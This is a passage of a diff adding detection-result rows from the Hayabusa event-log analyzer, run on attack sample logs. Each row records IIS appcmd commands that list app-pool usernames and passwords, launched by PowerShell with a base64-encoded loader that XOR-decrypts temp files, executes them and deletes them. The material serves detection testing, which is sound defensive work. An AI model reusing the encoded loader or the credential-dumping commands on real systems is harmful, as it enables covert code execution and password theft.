AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Line Number: 0"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool ""Description: Cannot read configuration file due to insufficient permissions"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwA